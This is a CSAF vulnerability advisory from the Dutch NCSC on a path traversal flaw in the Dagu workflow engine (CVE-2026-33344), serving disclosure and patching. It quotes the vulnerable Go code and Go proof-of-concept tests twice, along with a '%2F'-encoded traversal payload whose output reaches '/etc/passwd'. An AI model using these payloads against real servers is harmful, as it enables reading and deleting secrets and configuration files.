{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33344", "tracking": { "current_release_date": "2026-03-29T01:16:58.000365Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33344", "initial_release_date": "2026-03-21T01:08:19.131312Z", "revision_history": [ { "date": "2026-03-21T01:08:19.131312Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-21T01:08:22.304159Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-24T20:53:55.267681Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T20:54:13.814986Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:54:31.125579Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1).| Unknown change." }, { "date": "2026-03-24T20:54:33.734983Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:13:05.394299Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-25T18:13:42.037131Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (2)." }, { "date": "2026-03-26T00:50:30.793741Z", "number": "9", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-26T00:50:41.636459Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-26T13:25:38.291459Z", "number": "11", "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-26T13:25:44.814335Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:58:20.000082Z", "number": "13", "summary": "References created (1)." }, { "date": "2026-03-28T07:58:23.539438Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-03-28T08:11:14.259515Z", "number": "15", "summary": "References removed (1)." }, { "date": "2026-03-29T01:16:44.642883Z", "number": "16", "summary": "References created (1)." } ], "status": "interim", "version": "16" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=2.0.0|<2.3.1", "product": { "name": "vers:unknown/>=2.0.0|<2.3.1", "product_id": "CSAFPID-5917714", "product_identification_helper": { "cpe": "cpe:2.3:a:dagu:dagu:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "dagu" } ], "category": "vendor", "name": "dagu" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=1.30.4-0.20260221021317-e2ed589105d7|<1.30.4-0.20260319093346-7d07fda8f9de", "product": { "name": "vers:unknown/>=1.30.4-0.20260221021317-e2ed589105d7|<1.30.4-0.20260319093346-7d07fda8f9de", "product_id": "CSAFPID-5907217" } }, { "category": "product_version_range", "name": "vers:unknown/>=2.0.0|<2.3.1", "product": { "name": "vers:unknown/>=2.0.0|<2.3.1", "product_id": "CSAFPID-5902837" } } ], "category": "product_name", "name": "dagu" } ], "category": "vendor", "name": "dagu-org" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33344", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" }, "notes": [ { "category": "description", "text": "The fix for CVE-2026-27598 (commit e2ed589, PR #1691) added `ValidateDAGName` to `CreateNewDAG` and rewrote `generateFilePath` to use `filepath.Base`. This patched the CREATE path. The remaining API endpoints - GET, DELETE, RENAME, EXECUTE - all pass the `{fileName}` URL path parameter to `locateDAG` without calling `ValidateDAGName`. `%2F`-encoded forward slashes in the `{fileName}` segment traverse outside the DAGs directory.\n\n### Vulnerable code\n\n`internal/persis/filedag/store.go`, lines 508-513:\n\n```go\nfunc (store *Storage) locateDAG(nameOrPath string) (string, error) {\n if strings.Contains(nameOrPath, string(filepath.Separator)) {\n foundPath, err := findDAGFile(nameOrPath)\n if err == nil {\n return foundPath, nil // returns arbitrary resolved path\n }\n }\n // ...safe searchPaths branch follows\n```\n\n`findDAGFile` resolves the path with `filepath.Abs` and checks only that the file exists with a YAML extension. No containment check against `baseDir`.\n\nChi v5 routes using `r.URL.RawPath` when set. The pattern `/dags/{fileName}/spec` captures `..%2F..%2Fetc%2Ftarget.yaml` as a single path segment. The oapi-codegen runtime calls `url.PathUnescape`, producing `../../etc/target.yaml`. This decoded string reaches `locateDAG` with the `/` separator intact.\n\nGo's `net/http.ServeMux` would normally redirect paths containing `..`, but dagu binds the chi mux directly to `&http.Server{Handler: r}` (server.go:833-834), so no path cleaning fires.\n\n### Affected endpoints\n\nThe three confirmed impacts via `locateDAG`:\n\n| Endpoint | Impact |\n|----------|--------|\n| `GET /dags/{fileName}/spec` | Arbitrary `.yaml`/`.yml` file read (`os.ReadFile`) |\n| `DELETE /dags/{fileName}` | Arbitrary `.yaml`/`.yml` file delete (`os.Remove`) |\n| `POST /dags/{fileName}/start` | Load arbitrary YAML, execute as workflow |\n\nSame pattern affects all other `{fileName}` endpoints: `/dag-runs`, `/dag-runs/{id}`, `/rename`, `/start-sync`, `/enqueue`, and webhook handlers. `UpdateDAGSpec` is incidentally blocked by DAG name validation during YAML parsing - not a security check, just data integrity validation that happens to reject `/`.\n\n### PoC\n\n**Store-level** (dagu v2.0.2, Go 1.26, macOS; `locateDAG` unchanged through v2.3.0):\n\n```go\nfunc TestLocateDAGPathTraversal(t *testing.T) {\n baseDir, _ := os.MkdirTemp(\"\", \"bd\")\n defer os.RemoveAll(baseDir)\n outsideDir, _ := os.MkdirTemp(\"\", \"od\")\n defer os.RemoveAll(outsideDir)\n\n store := filedag.New(baseDir, filedag.WithSkipExamples(true))\n ctx := context.Background()\n store.Create(ctx, \"legit\", []byte(\"name: legit\\nsteps:\\n - name: s\\n command: echo ok\\n\"))\n\n target := filepath.Join(outsideDir, \"secret.yaml\")\n os.WriteFile(target, []byte(\"password: hunter2\\ndb_host: prod-db.internal\\n\"), 0644)\n\n rel, _ := filepath.Rel(baseDir, target)\n spec, _ := store.GetSpec(ctx, rel)\n fmt.Println(spec)\n}\n```\n\nOutput:\n\n```\nbaseDir: /tmp/bd1816472583\ntargetFile: /tmp/od3906487343/secret.yaml\ntraversal: ../od3906487343/secret.yaml\n\n=== GetSpec (arbitrary file read) ===\nSUCCESS: read file outside baseDir\nContent:\npassword: hunter2\ndb_host: prod-db.internal\n\n=== Delete (arbitrary file delete) ===\nSUCCESS: deleted /tmp/od3906487343/important.yaml\n```\n\n**HTTP-level** (chi v5.2.2):\n\n```go\nr := chi.NewRouter()\nr.Get(\"/dags/{fileName}/spec\", func(w http.ResponseWriter, r *http.Request) {\n raw := chi.URLParam(r, \"fileName\")\n decoded, _ := url.PathUnescape(raw)\n fmt.Fprintf(w, \"raw=%s\\ndecoded=%s\\n\", raw, decoded)\n})\n\nreq := httptest.NewRequest(\"GET\", \"/dags/..%2F..%2Fetc%2Ftarget.yaml/spec\", nil)\nw := httptest.NewRecorder()\nr.ServeHTTP(w, req)\n```\n\nOutput:\n\n```\npath: /dags/..%2F..%2Fetc%2Fpasswd/spec\nstatus: 200\nraw=..%2F..%2Fetc%2Fpasswd\ndecoded=../../etc/passwd\n```\n\nChi captures `..%2F..%2Fetc%2Fpasswd` as one path segment via `RawPath`, oapi-codegen decodes `%2F` to `/`. Confirmed with chi v5.2.2.\n\n### Affected versions\n\n- v2.0.0 through v2.3.0 (current latest, checked 2026-03-18).\n- The `locateDAG` function with the `filepath.Separator` code path was introduced in commit 1557b14f (PR #1573) as part of the v2.0.0 rewrite.\n- The CVE-2026-27598 fix (e2ed589) also landed in v2.0.0 - it patched `CreateNewDAG` but didn't address the new `locateDAG` code path that was introduced in the same release.\n\n### Suggested fix\n\nAdd path containment to `locateDAG` rather than sprinkling `ValidateDAGName` across every handler. Reject names containing path separators for HTTP-facing callers. If the separator code path is needed for internal worker communication (PR #1573), split `locateDAG` into a validated public method (HTTP handlers) and an internal method (trusted callers only).\n\n### Impact\n\nAn authenticated user (or any user if `auth.mode=none`) can read or delete any `.yaml`/`.yml` file on the server filesystem that the process can access. K8s secrets stored as YAML, app configs, other DAG files.\n\nThe execute endpoints also traverse via `locateDAG`, loading the target YAML as a DAG definition. If the file contains valid DAG syntax with shell commands, those commands execute as the dagu process user. I haven't verified this end-to-end since it requires a target file with DAG-compatible structure, but the code path is the same `locateDAG` call confirmed above.\n\nAuth is enabled by default since PR #1688 (v2.0.0), but exploitable by any authenticated user regardless of role - the DAG read/delete paths don't enforce RBAC granularity. Pre-v2.0.0 deployments or those with `auth.mode=none` are exploitable without credentials.", "title": "github - https://api.github.com/advisories/GHSA-ph8x-4jfv-v9v8" }, { "category": "description", "text": "Dagu is a workflow engine with a built-in Web user interface. From version 2.0.0 to before version 2.3.1, the fix for CVE-2026-27598 added ValidateDAGName to CreateNewDAG and rewrote generateFilePath to use filepath.Base. This patched the CREATE path. The remaining API endpoints - GET, DELETE, RENAME, EXECUTE - all pass the {fileName} URL path parameter to locateDAG without calling ValidateDAGName. %2F-encoded forward slashes in the {fileName} segment traverse outside the DAGs directory. This issue has been patched in version 2.3.1.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33344" }, { "category": "description", "text": "Dagu is a workflow engine with a built-in Web user interface. From version 2.0.0 to before version 2.3.1, the fix for CVE-2026-27598 added ValidateDAGName to CreateNewDAG and rewrote generateFilePath to use filepath.Base. This patched the CREATE path. The remaining API endpoints - GET, DELETE, RENAME, EXECUTE - all pass the {fileName} URL path parameter to locateDAG without calling ValidateDAGName. %2F-encoded forward slashes in the {fileName} segment traverse outside the DAGs directory. This issue has been patched in version 2.3.1.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33344.json" }, { "category": "description", "text": "The fix for CVE-2026-27598 (commit e2ed589, PR #1691) added `ValidateDAGName` to `CreateNewDAG` and rewrote `generateFilePath` to use `filepath.Base`. This patched the CREATE path. The remaining API endpoints - GET, DELETE, RENAME, EXECUTE - all pass the `{fileName}` URL path parameter to `locateDAG` without calling `ValidateDAGName`. `%2F`-encoded forward slashes in the `{fileName}` segment traverse outside the DAGs directory.\n\n### Vulnerable code\n\n`internal/persis/filedag/store.go`, lines 508-513:\n\n```go\nfunc (store *Storage) locateDAG(nameOrPath string) (string, error) {\n if strings.Contains(nameOrPath, string(filepath.Separator)) {\n foundPath, err := findDAGFile(nameOrPath)\n if err == nil {\n return foundPath, nil // returns arbitrary resolved path\n }\n }\n // ...safe searchPaths branch follows\n```\n\n`findDAGFile` resolves the path with `filepath.Abs` and checks only that the file exists with a YAML extension. No containment check against `baseDir`.\n\nChi v5 routes using `r.URL.RawPath` when set. The pattern `/dags/{fileName}/spec` captures `..%2F..%2Fetc%2Ftarget.yaml` as a single path segment. The oapi-codegen runtime calls `url.PathUnescape`, producing `../../etc/target.yaml`. This decoded string reaches `locateDAG` with the `/` separator intact.\n\nGo's `net/http.ServeMux` would normally redirect paths containing `..`, but dagu binds the chi mux directly to `&http.Server{Handler: r}` (server.go:833-834), so no path cleaning fires.\n\n### Affected endpoints\n\nThe three confirmed impacts via `locateDAG`:\n\n| Endpoint | Impact |\n|----------|--------|\n| `GET /dags/{fileName}/spec` | Arbitrary `.yaml`/`.yml` file read (`os.ReadFile`) |\n| `DELETE /dags/{fileName}` | Arbitrary `.yaml`/`.yml` file delete (`os.Remove`) |\n| `POST /dags/{fileName}/start` | Load arbitrary YAML, execute as workflow |\n\nSame pattern affects all other `{fileName}` endpoints: `/dag-runs`, `/dag-runs/{id}`, `/rename`, `/start-sync`, `/enqueue`, and webhook handlers. `UpdateDAGSpec` is incidentally blocked by DAG name validation during YAML parsing - not a security check, just data integrity validation that happens to reject `/`.\n\n### PoC\n\n**Store-level** (dagu v2.0.2, Go 1.26, macOS; `locateDAG` unchanged through v2.3.0):\n\n```go\nfunc TestLocateDAGPathTraversal(t *testing.T) {\n baseDir, _ := os.MkdirTemp(\"\", \"bd\")\n defer os.RemoveAll(baseDir)\n outsideDir, _ := os.MkdirTemp(\"\", \"od\")\n defer os.RemoveAll(outsideDir)\n\n store := filedag.New(baseDir, filedag.WithSkipExamples(true))\n ctx := context.Background()\n store.Create(ctx, \"legit\", []byte(\"name: legit\\nsteps:\\n - name: s\\n command: echo ok\\n\"))\n\n target := filepath.Join(outsideDir, \"secret.yaml\")\n os.WriteFile(target, []byte(\"password: hunter2\\ndb_host: prod-db.internal\\n\"), 0644)\n\n rel, _ := filepath.Rel(baseDir, target)\n spec, _ := store.GetSpec(ctx, rel)\n fmt.Println(spec)\n}\n```\n\nOutput:\n\n```\nbaseDir: /tmp/bd1816472583\ntargetFile: /tmp/od3906487343/secret.yaml\ntraversal: ../od3906487343/secret.yaml\n\n=== GetSpec (arbitrary file read) ===\nSUCCESS: read file outside baseDir\nContent:\npassword: hunter2\ndb_host: prod-db.internal\n\n=== Delete (arbitrary file delete) ===\nSUCCESS: deleted /tmp/od3906487343/important.yaml\n```\n\n**HTTP-level** (chi v5.2.2):\n\n```go\nr := chi.NewRouter()\nr.Get(\"/dags/{fileName}/spec\", func(w http.ResponseWriter, r *http.Request) {\n raw := chi.URLParam(r, \"fileName\")\n decoded, _ := url.PathUnescape(raw)\n fmt.Fprintf(w, \"raw=%s\\ndecoded=%s\\n\", raw, decoded)\n})\n\nreq := httptest.NewRequest(\"GET\", \"/dags/..%2F..%2Fetc%2Ftarget.yaml/spec\", nil)\nw := httptest.NewRecorder()\nr.ServeHTTP(w, req)\n```\n\nOutput:\n\n```\npath: /dags/..%2F..%2Fetc%2Fpasswd/spec\nstatus: 200\nraw=..%2F..%2Fetc%2Fpasswd\ndecoded=../../etc/passwd\n```\n\nChi captures `..%2F..%2Fetc%2Fpasswd` as one path segment via `RawPath`, oapi-codegen decodes `%2F` to `/`. Confirmed with chi v5.2.2.\n\n### Affected versions\n\n- v2.0.0 through v2.3.0 (current latest, checked 2026-03-18).\n- The `locateDAG` function with the `filepath.Separator` code path was introduced in commit 1557b14f (PR #1573) as part of the v2.0.0 rewrite.\n- The CVE-2026-27598 fix (e2ed589) also landed in v2.0.0 - it patched `CreateNewDAG` but didn't address the new `locateDAG` code path that was introduced in the same release.\n\n### Suggested fix\n\nAdd path containment to `locateDAG` rather than sprinkling `ValidateDAGName` across every handler. Reject names containing path separators for HTTP-facing callers. If the separator code path is needed for internal worker communication (PR #1573), split `locateDAG` into a validated public method (HTTP handlers) and an internal method (trusted callers only).\n\n### Impact\n\nAn authenticated user (or any user if `auth.mode=none`) can read or delete any `.yaml`/`.yml` file on the server filesystem that the process can access. K8s secrets stored as YAML, app configs, other DAG files.\n\nThe execute endpoints also traverse via `locateDAG`, loading the target YAML as a DAG definition. If the file contains valid DAG syntax with shell commands, those commands execute as the dagu process user. I haven't verified this end-to-end since it requires a target file with DAG-compatible structure, but the code path is the same `locateDAG` call confirmed above.\n\nAuth is enabled by default since PR #1688 (v2.0.0), but exploitable by any authenticated user regardless of role - the DAG read/delete paths don't enforce RBAC granularity. Pre-v2.0.0 deployments or those with `auth.mode=none` are exploitable without credentials.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-ph8x-4jfv-v9v8.json?alt=media" }, { "category": "description", "text": "Dagu has an incomplete fix for CVE-2026-27598: path traversal via %2F-encoded slashes in locateDAG in github.com/dagu-org/dagu", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4785.json?alt=media" }, { "category": "other", "text": "0.00016", "title": "EPSS" }, { "category": "other", "text": "3.4", "title": "NCSC Score" }, { "category": "other", "text": "Exploit code publicly available, There is exploit data available from source Nvd, The value of the most recent EPSS score", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5902837", "CSAFPID-5907217", "CSAFPID-5917714" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-ph8x-4jfv-v9v8" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33344" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33344.json" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-ph8x-4jfv-v9v8.json?alt=media" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4785.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/dagu-org/dagu/security/advisories/GHSA-ph8x-4jfv-v9v8" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/dagu-org/dagu/commit/7d07fda8f9de3ae73dfb081ccd0639f8059c56bb" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-ph8x-4jfv-v9v8" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33344" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5902837", "CSAFPID-5907217", "CSAFPID-5917714" ] } ], "title": "CVE-2026-33344" } ] }